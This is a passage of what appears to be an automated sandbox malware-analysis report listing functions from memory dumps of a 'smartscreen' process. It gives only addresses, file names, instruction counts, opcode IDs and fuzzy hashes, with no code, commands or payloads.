                                                                                                                            • Instruction Fuzzy Hash: 25F05830A0A50ECFEB50DB84C8587EC73E1FB58311F514A79C005A72A0EE3A6E45CB24
                                                                                                                            Function 00007FFD9B880A05 Relevance: .0, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b880000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3de6f078003d6a03d2e7b73fa15ede12e488c758e0fa7ce6535d68670438d617
                                                                                                                            • Instruction ID: e25e430b94890cf1381ffd45e6049ee18a6517b518c5400d0b98e1fed9400ad6
                                                                                                                            • Opcode Fuzzy Hash: 3de6f078003d6a03d2e7b73fa15ede12e488c758e0fa7ce6535d68670438d617
                                                                                                                            • Instruction Fuzzy Hash: 0FE09271B29919CFD720DB5DD4D08E43BE4FB48354B9101F3C404CA161D22459958750
                                                                                                                            Function 00007FFD9B8AAFD0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                            Function 00007FFD9B8AB0A0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                            Function 00007FFD9B870B92 Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b870000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7f4fdd7b36c35654760b3b1d02b807360b3405a1984611a69424e97fd24046d5
                                                                                                                            • Instruction ID: b4d9ca00fe46fe2f85f04ee97fc6063db79b1a8c8d1a0f1f6eacb92bca5b5680
                                                                                                                            • Opcode Fuzzy Hash: 7f4fdd7b36c35654760b3b1d02b807360b3405a1984611a69424e97fd24046d5
                                                                                                                            • Instruction Fuzzy Hash: 2DD0A73166EA8E4FEB02B778DC9A4547FE0EF1F219FDA10E2D008CB5B2D5055999C701
                                                                                                                            Function 00007FFD9B874F9A Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b870000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 57be8222ba4c2beedd7fbd5c9be00369cdad668df1b32d2e97d25566a62fc264
                                                                                                                            • Instruction ID: 772e5d30f98c0e758bc370a3c5efe70dd93fabf83cd4c409bdf8a9e4b2a34b2f
                                                                                                                            • Opcode Fuzzy Hash: 57be8222ba4c2beedd7fbd5c9be00369cdad668df1b32d2e97d25566a62fc264
                                                                                                                            • Instruction Fuzzy Hash: 99E0ED30F1951E8AFBA4E794C8F43B96251DF98708F1601B5D90EE72E5DD28AF81A640
                                                                                                                            Function 00007FFD9B8AE459 Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7ebcdeabfa4655eab8cba0af9db8fb7c7c9e6334e735035874d236876b5149d3
                                                                                                                            • Instruction ID: 354012b9ba581eecdf1907ca28d6af5f172a3516d2602bc3da61dc10294d0ee1
                                                                                                                            • Opcode Fuzzy Hash: 7ebcdeabfa4655eab8cba0af9db8fb7c7c9e6334e735035874d236876b5149d3
                                                                                                                            • Instruction Fuzzy Hash: 28E0123554A3C08FCB0A9B3488A89903F70EE1721038A41EAC049CF1B3DA29894AC711
                                                                                                                            Function 00007FFD9B8AE4D9 Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b54a1b9d4c64f0af30c466d048126dc20f3d5ec595e18ec3b745e023fb8fbe69
                                                                                                                            • Instruction ID: 4019b7ad0fd2d446837aae40a1303d116c21e7eacaed0d10f1fdc092bc791d94
                                                                                                                            • Opcode Fuzzy Hash: b54a1b9d4c64f0af30c466d048126dc20f3d5ec595e18ec3b745e023fb8fbe69
                                                                                                                            • Instruction Fuzzy Hash: 8EE04F2194FBC04FC71B9B3488798507FA4DE2721174A44EFC089CF5F3E5199849C711
                                                                                                                            Function 00007FFD9B8A2960 Relevance: .0, Instructions: 18COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                            Function 00007FFD9B8AC388 Relevance: .0, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                                                                            • Instruction ID: a090e7318a048ae77240d8384dfd0b96ce6fded74c9ffade75fc6ba0f94c54dc
                                                                                                                            • Opcode Fuzzy Hash: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                                                                            • Instruction Fuzzy Hash: ADD02230B52C040FC70CA73888A88303390EB6E20779104A8D00AC72B1D92ADC88C780
                                                                                                                            Function 00007FFD9B8A79D8 Relevance: .0, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fe6b07c59252034134d45c01d9cb1620296feb28c577bcd899787bddbc10cddb
                                                                                                                            • Instruction ID: 6c1dc2bdfc2b4d935091a0d764e1b03fc056c0350fc44e0a0ab2966c7a07cbba
                                                                                                                            • Opcode Fuzzy Hash: fe6b07c59252034134d45c01d9cb1620296feb28c577bcd899787bddbc10cddb
                                                                                                                            • Instruction Fuzzy Hash: D5D02230B51C040FC71CA73888588303390EB6E206BC100A8D00AC72B1D92ADC89C740
                                                                                                                            Function 00007FFD9B8A848C Relevance: .0, Instructions: 16COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ab9562f4afc654ad43cb676b16cd503151af6ef77b6da7b3baf5e01dc5b9db0a
                                                                                                                            • Instruction ID: bff7a73eae6721ff2d01221e2f4140e390745df0a68b7fec235da0d54d8255e0
                                                                                                                            • Opcode Fuzzy Hash: ab9562f4afc654ad43cb676b16cd503151af6ef77b6da7b3baf5e01dc5b9db0a
                                                                                                                            • Instruction Fuzzy Hash: 80D0A73194B5844FCB0A9B3584A8C607F50DF5A20478940ECC04A8F1B2D9259949C700
                                                                                                                            Function 00007FFD9B871270 Relevance: .0, Instructions: 14COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b870000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 184a2c3277aecd18d76af0935761f92e34412be27cf2f83d8a67b28de76b0507
                                                                                                                            • Instruction ID: bdae4affad6586a11bf0f2d72d9ff513beb5e1b3192763f198ab63a382f692ff
                                                                                                                            • Opcode Fuzzy Hash: 184a2c3277aecd18d76af0935761f92e34412be27cf2f83d8a67b28de76b0507
                                                                                                                            • Instruction Fuzzy Hash: 13C0123061180C9FCA48EB28C898D14B3A0FB5D308B960094E00DCB2B1E62AECC2CB40
                                                                                                                            Function 00007FFD9B8706A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b870000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4e81d36aed7d78191ebda0ce0bf6983de95ec8fc31eb21b89629192ec54cf290
                                                                                                                            • Instruction ID: 70c5356b647492d7bd0c15a1d05df0551fea639c3f7354731be817364523b7c9
                                                                                                                            • Opcode Fuzzy Hash: 4e81d36aed7d78191ebda0ce0bf6983de95ec8fc31eb21b89629192ec54cf290
                                                                                                                            • Instruction Fuzzy Hash: 4FC01200F2B60E00EC34B3AA98B20ACA101EBCDA18FD20032C00C820E1984D22852146
                                                                                                                            Function 00007FFD9B884CA2 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b880000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 985abb8d6beb36a6e63653237f6bf30b7901326012704906343365838102349e
                                                                                                                            • Instruction ID: 67fa57ba893cb849cef04ba3be249d8174790041a243a5320b3e2eaaaad996ae
                                                                                                                            • Opcode Fuzzy Hash: 985abb8d6beb36a6e63653237f6bf30b7901326012704906343365838102349e
                                                                                                                            • Instruction Fuzzy Hash: 15D0A731A0840D8BD658EB8494A07793251EF4C348F160078D81E83197DD3459138601
                                                                                                                            Function 00007FFD9B872A44 Relevance: .0, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b870000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8ac0a03c5a612fef3f4bc486447964b49cac15b96b36fc3615c662e8e6e340ab
                                                                                                                            • Instruction ID: 61e3417e4b4ccf67920435882b8277eed71f51a3623c6c546d4a9557439235b7
                                                                                                                            • Opcode Fuzzy Hash: 8ac0a03c5a612fef3f4bc486447964b49cac15b96b36fc3615c662e8e6e340ab
                                                                                                                            • Instruction Fuzzy Hash: 42C08C00F0C81A02E319B304442427E04038B44608FC40474E01EE33CECC5DAE0212C7
                                                                                                                            Function 00007FFD9B8706C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b870000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 666cf8b823b28f899d201f99a08d7ce51af468bea5ae6a0f7c31dc5b3b410cef
                                                                                                                            • Instruction ID: a99d8ce0d2c82c1333096778c749cce48e8b33eda9f217b828108744794550ed
                                                                                                                            • Opcode Fuzzy Hash: 666cf8b823b28f899d201f99a08d7ce51af468bea5ae6a0f7c31dc5b3b410cef
                                                                                                                            • Instruction Fuzzy Hash: 19B01200D7744F00E83833FA08E2164F040DB4D10CFC20070D40D420D1984D12942242

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B8709B0 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b870000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: c9$!k9$"s9$#{9
                                                                                                                            • API String ID: 0-1692736845
                                                                                                                            • Opcode ID: b3ec4fb66ba4ec25eca8890a8d9937f7ef2261ce4c3adb1d8b3477346e373c56
                                                                                                                            • Instruction ID: 8a99ffe1031c47987eb3b1423a190bc69c166736cdae0bfe1dea7c2e4c54a4cc
                                                                                                                            • Opcode Fuzzy Hash: b3ec4fb66ba4ec25eca8890a8d9937f7ef2261ce4c3adb1d8b3477346e373c56
                                                                                                                            • Instruction Fuzzy Hash: 9D41D297B0D07689E31F33FD79698ED5B48CF8523CB0846B7E05D8B0D79C482086A2E5

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B890D80 Relevance: .3, Instructions: 273COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b890000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 48536800688bae8f5c66fb0aab92783b36b573d88a1f93949e2c4ea7551e65ba
                                                                                                                            • Instruction ID: be4b4caa16257a080eb11916e45b524ec99f60d7958a16db2f700ac9cf6616a0
                                                                                                                            • Opcode Fuzzy Hash: 48536800688bae8f5c66fb0aab92783b36b573d88a1f93949e2c4ea7551e65ba
                                                                                                                            • Instruction Fuzzy Hash: D7910171A19A8D8FEB98DBA8D8657B9BFE1FF99310F4101BAD049D33E2CA741401C741
                                                                                                                            Function 00007FFD9B8C15A9 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 515801f9886e3f887f9506096ec1d08e67271dec1b1526f9aba4f0164a43d7f6
                                                                                                                            • Instruction ID: 6e8cf86f6fef7b168f7bfc050fd3f79f9b0820484811e98f408f34e877489a4f
                                                                                                                            • Opcode Fuzzy Hash: 515801f9886e3f887f9506096ec1d08e67271dec1b1526f9aba4f0164a43d7f6
                                                                                                                            • Instruction Fuzzy Hash: 9C110A71A1F7884FDB11BB7848A94A47FB0EF1A300B0541EBC049C70A3D9299945C741
                                                                                                                            Function 00007FFD9B8A3F09 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8a0000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 1e3502eba20fb4f649d1a080173a81712112346f8ecbf77e20fabb7f3e82fa2a
                                                                                                                            • Instruction ID: 9cf479aaadf541191d37b7df3fe24349f2f97e1884d180c647780ec71f0d34ed
                                                                                                                            • Opcode Fuzzy Hash: 1e3502eba20fb4f649d1a080173a81712112346f8ecbf77e20fabb7f3e82fa2a
                                                                                                                            • Instruction Fuzzy Hash: F2F0ED31A0F3C04FCB16AA7488688447FB0EF6720074A52EEC046CF1A3EA2CD88AC710
                                                                                                                            Function 00007FFD9B8C3B79 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: e7b5cc0fc85a29af10ce8a1d418bf222c095bfde7f4e21b5a3951de569c3493b
                                                                                                                            • Instruction ID: a362daf785e265cf91a6185d18bbd6d271a782cf55ac662b21d68943d102e0e1
                                                                                                                            • Opcode Fuzzy Hash: e7b5cc0fc85a29af10ce8a1d418bf222c095bfde7f4e21b5a3951de569c3493b
                                                                                                                            • Instruction Fuzzy Hash: CFE0657150E7C44FC716AA3488698547FA0EF6721174A41EFC045CF5A3DA2D8885C701
                                                                                                                            Function 00007FFD9B8C28B9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: ec567ad4d7b3718cc510b79a8652c96a56699c5e12c7efe385591bae7eb244b3
                                                                                                                            • Instruction ID: 043de5b0c22bf3fbaf79f75eefae3c0632b32fe861a4d338b232afcabf1d5eb8
                                                                                                                            • Opcode Fuzzy Hash: ec567ad4d7b3718cc510b79a8652c96a56699c5e12c7efe385591bae7eb244b3
                                                                                                                            • Instruction Fuzzy Hash: 27E06D2164E3C04FCB16AB3488688547FA0EE6720178A52EFC046CF1A3EA2D8989C701
                                                                                                                            Function 00007FFD9B8C8D09 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: b52c1ed4289b6660ec6b7e8c1c16ca32936efa339ecf85a1a553c75f4a3116f3
                                                                                                                            • Instruction ID: b9c77f9c212792c029c59ac88201721375c11a02303548c321ea15a39538a1e2
                                                                                                                            • Opcode Fuzzy Hash: b52c1ed4289b6660ec6b7e8c1c16ca32936efa339ecf85a1a553c75f4a3116f3
                                                                                                                            • Instruction Fuzzy Hash: 40E06D6144F3C04FCB06AB74886A8147FB0AE6721074B40DEC185CB0B3D6198849C701
                                                                                                                            Function 00007FFD9B8CB589 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 7a671ec20bb3d6628afbdea1afdbd286dcb1210bdae0cbaf4ff78f672e699990
                                                                                                                            • Instruction ID: de25d385769abba51c492303dc8ddf1c20e326563c866a156f4b362dc7d681c8
                                                                                                                            • Opcode Fuzzy Hash: 7a671ec20bb3d6628afbdea1afdbd286dcb1210bdae0cbaf4ff78f672e699990
                                                                                                                            • Instruction Fuzzy Hash: 30E0E56194E7D44FCB1AAB74886A8557FA0AE6B31078A40EEC186CF1B3E6299849C701
                                                                                                                            Function 00007FFD9B8C2949 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 902fa505e0a8a33546ec5cab3864f8095cbfba75bf8787247476ae2036b67fd9
                                                                                                                            • Instruction ID: d104bcae6447e764c89f39b04e94322e2c9c3f5a698b299140e90c82b893d463
                                                                                                                            • Opcode Fuzzy Hash: 902fa505e0a8a33546ec5cab3864f8095cbfba75bf8787247476ae2036b67fd9
                                                                                                                            • Instruction Fuzzy Hash: C4E04F7154A3C04FCB06EB7484A9C543FB0EE6721078B41DEC04ACF1B3E62D8949C701
                                                                                                                            Function 00007FFD9B8908D0 Relevance: .2, Instructions: 158COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b890000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cae322684615d5a16a1f1db777c4bf41ae97070ad4532dd6a98a08dae3877fab
                                                                                                                            • Instruction ID: 5f2fa3b3b8e373e0eed1aeecb549cc5df6afd926a6fde7332c6179687ddd23b2
                                                                                                                            • Opcode Fuzzy Hash: cae322684615d5a16a1f1db777c4bf41ae97070ad4532dd6a98a08dae3877fab
                                                                                                                            • Instruction Fuzzy Hash: 34416D12B0C5298FE759B7BCB4696F97B81EF89325B0404FFD04EC71D7DD18A8428284
                                                                                                                            Function 00007FFD9B8C2F81 Relevance: .1, Instructions: 118COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.2188856634.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f1f0e9c5c294dc963b74c563e6e835bd2cd4c2e0e269ef1be7e25f7921405ea5
                                                                                                                            • Instruction ID: 5df8d855cf75e87ea9297fe994b49d592220a2931ab6b0c89fd6e244e7c38263
